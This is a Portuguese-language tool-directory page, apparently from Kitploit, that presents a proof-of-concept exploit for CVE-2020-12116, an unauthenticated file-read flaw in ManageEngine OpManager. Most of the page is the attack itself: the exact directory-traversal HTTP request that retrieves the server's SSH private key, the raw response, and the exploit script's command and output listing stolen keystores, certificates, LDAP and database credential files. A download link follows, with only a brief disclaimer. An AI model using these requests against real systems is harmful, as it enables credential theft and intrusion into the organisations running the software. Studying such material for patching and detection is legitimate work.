Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-12116 — Código de prova de conceito para explorar CVE-2020-12116: Leitura arbitrária de arquivo não autenticada no ManageEngine OpManger. | Kitploit
Ferramentas/GitHubGitHub/beetlechunks/cve-2020-12116
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesTestes de Penetração
GitHubbeetlechunks/cve-2020-12116

CVE-2020-12116

Código de prova de conceito para explorar CVE-2020-12116: Leitura arbitrária de arquivo não autenticada no ManageEngine OpManger.

Ver Repositório
3010há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-12116

Código de prova de conceito para explorar CVE-2020-12116: Leitura arbitrária de arquivos não autenticada no ManageEngine OpManger.

Resumo

A versão mais recente do OpManger contém uma vulnerabilidade de directory traversal que permite acesso irrestrito a todos os arquivos no aplicativo OpManager. Isso inclui chaves SSH privadas, keystores Java protegidos por senha e arquivos de configuração contendo senhas para keystores, certificados privados e o banco de dados de backend. Se o LDAP estiver configurado, as credenciais de domínio podem ser obtidas de "conf/OpManager/ldap.conf".

Análise da Vulnerabilidade

Faça uma requisição GET não autenticada ao diretório raiz do aplicativo ManageEngine OpManager, por padrão, na porta 8060.

root@kitploit:~
GET / HTTP/1.1
Host: <HOSTNAME>:8060
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

O HTML de resposta conterá URLs de "src" de JavaScript em cache.

root@kitploit:~
<SCRIPT LANGUAGE="javascript" SRC="/cachestart/125116/cacheend/apiclient/fluidicv2/
javascript/jquery/jquery-3.4.1.min.js"></SCRIPT>

O trecho da URL "SRC" acima contém uma vulnerabilidade de directory traversal que permite leituras arbitrárias de arquivos a partir do diretório de instalação raiz do ManageEngine. Por padrão, o caminho de instalação é "C:\Program Files\ManageEngine\OpManager".

NOTA: O número após "/cachestart/" é o número da build do produto, mas qualquer número pode ser usado para explorar a vulnerabilidade.

Aproveitando a URL de origem do script do HTML de resposta, uma requisição GET com directory traversal pode ser usada para ler arquivos arbitrários do servidor remoto.

REQUEST:

root@kitploit:~
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

RESPONSE:

root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

Exemplo usando o código de exploração Python3 fornecido

Visão geral:

root@kitploit:~
Este script aproveita a vulnerabilidade de leitura arbitrária de arquivos em endpoints do ManageEngine OpManager para baixar arquivos sensíveis, como chaves privadas, keystores privados, certificados, arquivos de configuração contendo senhas, etc.

Command:

root@kitploit:~
python3 exploit.py -t <hostname/IP> -p 8060 -d ./

Output:

root@kitploit:~
[+] bin/.ssh_host_dsa_key saved to ./bin|.ssh_host_dsa_key
[+] bin/.ssh_host_dsa_key.pub saved to ./bin|.ssh_host_dsa_key.pub
[+] bin/.ssh_host_rsa_key saved to ./bin|.ssh_host_rsa_key
[+] bin/.ssh_host_rsa_key.pub saved to ./bin|.ssh_host_rsa_key.pub
[+] conf/client.keystore saved to ./conf|client.keystore
[+] conf/customer-config.xml saved to ./conf|customer-config.xml
[+] conf/database_params.conf saved to ./conf|database_params.conf
[+] conf/FirewallAnalyzer/aaa_auth-conf.xml saved to ./conf|FirewallAnalyzer|aaa_auth-conf.xml
[+] conf/FirewallAnalyzer/auth-conf_ppm.xml saved to ./conf|FirewallAnalyzer|auth-conf_ppm.xml
[+] conf/gateway.conf saved to ./conf|gateway.conf
[+] conf/itom.truststore saved to ./conf|itom.truststore
[+] conf/netflow/auth-conf.xml saved to ./conf|netflow|auth-conf.xml
[+] conf/netflow/server.xml saved to ./conf|netflow|server.xml
[+] conf/netflow/ssl_server.xml saved to ./conf|netflow|ssl_server.xml
[+] conf/NFAEE/cs_server.xml saved to ./conf|NFAEE|cs_server.xml
[+] conf/OpManager/database_params.conf saved to ./conf|OpManager|database_params.conf
[+] conf/OpManager/database_params_DE.conf saved to ./conf|OpManager|database_params_DE.conf
[+] conf/OpManager/ldap.conf saved to ./conf|OpManager|ldap.conf
[+] conf/OpManager/MicrosoftSQL/database_params.conf saved to ./conf|OpManager|MicrosoftSQL|database_params.conf
[+] conf/OpManager/POSTGRESQL/database_params.conf saved to ./conf|OpManager|POSTGRESQL|database_params.conf
[+] conf/OpManager/POSTGRESQL/database_params_DE.conf saved to ./conf|OpManager|POSTGRESQL|database_params_DE.conf
[+] conf/OpManager/securitydbData.xml saved to ./conf|OpManager|securitydbData.xml
[+] conf/OpManager/SnmpDefaultProperties.xml saved to ./conf|OpManager|SnmpDefaultProperties.xml
[+] conf/Oputils/snmp/Community.xml saved to ./conf|Oputils|snmp|Community.xml
[+] conf/Persistence/DBconfig.xml saved to ./conf|Persistence|DBconfig.xml
[+] conf/Persistence/persistence-configurations.xml saved to ./conf|Persistence|persistence-configurations.xml
[+] conf/pmp/PMP_API.conf saved to ./conf|pmp|PMP_API.conf
[+] conf/pmp/pmp_server_cert.p12 saved to ./conf|pmp|pmp_server_cert.p12
[+] conf/product-config.xml saved to ./conf|product-config.xml
[+] conf/SANSeed.xml saved to ./conf|SANSeed.xml
[+] conf/server.keystore saved to ./conf|server.keystore
[+] conf/server.xml saved to ./conf|server.xml
[+] conf/system_properties.conf saved to ./conf|system_properties.conf
[+] conf/tomcat-users.xml saved to ./conf|tomcat-users.xml
[+] lib/OPM_APNS_Cert.p12 saved to ./lib|OPM_APNS_Cert.p12

Aviso Legal

Este código de prova de conceito foi criado para pesquisa acadêmica e não se destina a ser usado contra sistemas, exceto quando explicitamente autorizado. O código é fornecido como está, sem garantias ou promessas sobre sua execução. Não sou responsável ou culpado pelo uso indevido deste código.

Baixar ferramenta